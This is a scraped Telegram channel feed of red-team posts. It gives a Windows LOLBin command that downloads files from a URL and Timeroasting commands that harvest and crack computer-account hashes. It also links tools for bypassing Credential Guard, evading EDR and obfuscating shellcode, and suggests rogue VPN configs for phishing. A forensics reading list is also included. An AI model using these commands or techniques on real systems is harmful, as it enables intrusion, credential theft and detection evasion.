Source Byte – Telegram
Source Byte
7.76K subscribers
847 photos
73 videos
678 files
1.68K links
هشیار کسی باید کز عشق بپرهیزد
وین طبع که من دارم با عقل نیامیزد
Saadi Shirazi 187
Download Telegram
Forwarded from Source Byte (‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌ ‌$ᴘ3ᴅʏʟ1)
LOLBin for Downloading Arbitrary Files

C:\Windows\System32\IME\SHARED\IMEWDBLD.exe <URL>

Find the downloaded file in

%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>

#windows
#redteam
#lolbin
———
@islemolecule_source
👍4🍓3
mdmz_book_2nd.pdf
144.4 MB
Malware development by cocomelonc
🤡11👍64🔥1
Forwarded from README.hta
Список рекомендаций к изучению, составленный исключительно из моего опыта, в том числе когда я сама с нуля погружалась в форензику. Приведу оригинал и перевод книги, если он есть, но имейте ввиду, что порой читать в оригинале лучше, как минимум чтобы не встречать диковинные переводы в стиле "атака типа водопой"

Базовый уровень для вхождения в специальность (= must read):
1. Applied Incident Response, Steve Anson / Реагирование на компьютерные инциденты. Прикладной курс, Cтив Энсон
2. Incident Response Techniques for Ransomware Attacks, Oleg Skulkin / Шифровальщики, Олег Скулкин
3. Cybersecurity Ops with bash, Paul Troncone, Carl Albing / Bash и кибербезопасность, Олбинг Карл, Тронкон Пол

Средний уровень:
4. Practical Memory Forensics, Svetlana Ostrovskaya / Криминалистика компьютерной памяти на практике, Светлана Островская
5. Intelligence-Driven Incident Response, Scott J. Roberts, Rebekah Brown
6. Active Directory глазами хакера, Ralf Hacker

Уровень максимум
:
Вообще большинство книг уровнем повыше можно использовать больше как справочник или по случаю. Не стоит мучаться и читать от корки до корки просто потому что надо (но можете и почитать, если интересно)
7. File System Forensic Analysis, Brian Carrier
8. Practical Linux Forensics: A Guide for Digital Investigators, Bruce Nikkel
9. Восстановление данных. Практическое руководство, Крис Касперски, В.Е. Холмогоров

Extremely high level:
10. https://www.google.com/

Все указанные файлы приложены в комментариях

#books
👍41
Pure Malware Development Resource Collections

https://github.com/malsearchs/Pure-Malware-Development.git
👍5
Today I made public NativeBypassCredGuard, a tool to bypass Credential Guard by patching WDigest.dll using only NTAPI functions:
https://github.com/ricardojoserf/NativeBypassCredGuard.git

X: https://x.com/RicardoJoseRF
👍7
Hiding In PlainSight - Proxying DLL Loads To Hide From ETWTI Stack Tracing

https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/
🔥8👍3
Hacking APIs - Early Access.pdf
12.5 MB
Hacking API - Early Access
👾12👍5🙏1
🗿21❤‍🔥1
SuperdEye is the implementation of HellHall (a revised version of TartarusGate) in pure Go and Go Assembler.

The purpose is to scan hooked NTDLL and retrieve the Syscall number to then do an indirect Syscall with it, thus allowing the bypass of AV/EDR that put hooks on functions.


https://github.com/almounah/superdeye.git
👍5
Roasting - Timeroasting
Timeroasting takes advantage of Windows' NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer account by sending an NTP request with that account's RID

SecuraBV/Timeroast - Timeroasting noscripts by Tom Tervoort

sudo ./timeroast.py 10.0.0.42 | tee ntp-hashes.txt
hashcat -m 31300 ntp-hashes.txt




On the Applicability of the Timeroasting Attack

https://snovvcrash.rocks/2024/12/08/applicability-of-the-timeroasting-attack.html
👍7😱2
Rogue OpenVpn and WireGuard! 🧭

Still sending docm macros? Reconsider your phishing noscripts! Send openvpn and wireguard configurations! U can easily achieve command exec using VPN : )

Examples here:
https://github.com/CICADA8-Research/Penetration.git
👍7🔥2👏1🥱1
🔥10🥱3👍2👏1
LexiCrypt is a shellcode obfuscation and encoding tool that transforms raw shellcode bytes into a "lexicon" of words derived from file names in the windows system32 directory. The resulting encoded output can then be embedded into a code template in various programming languages (e.g., C++, Rust, C#, Go, VBScript/WScript). This approach can help disguise shellcode and potentially bypass naive detection mechanisms.


https://github.com/tehstoni/LexiCrypt.git
👍8🔥1
🔥 Initial Access Guild registration is now open! 🔥

Offensive Engineers, let us unite in a trusted, vetted community!

I invite you to a curated closed Discord server, where ideas can be exchanged safely.

☢️ binary-offensive.com/guild ☢️

See you inside fellow Breacher!
👍7🔥3😁2👾21👌1
Custom instruction length for hex-rays

The Instrlen plugin is a tool for IDA Pro that allows for setting the length of an instruction to a custom value. This can be useful when the code is obfuscated or there are jumps after the instruction prefixes.


https://github.com/milankovo/instrlen.git
😁4👍1
CPP / C++ Notes - Windows API Programming Win32
https://caiorss.github.io/C-Cpp-Notes/WindowsAPI-cpp.html#orge9d5c6d
🔥8👍1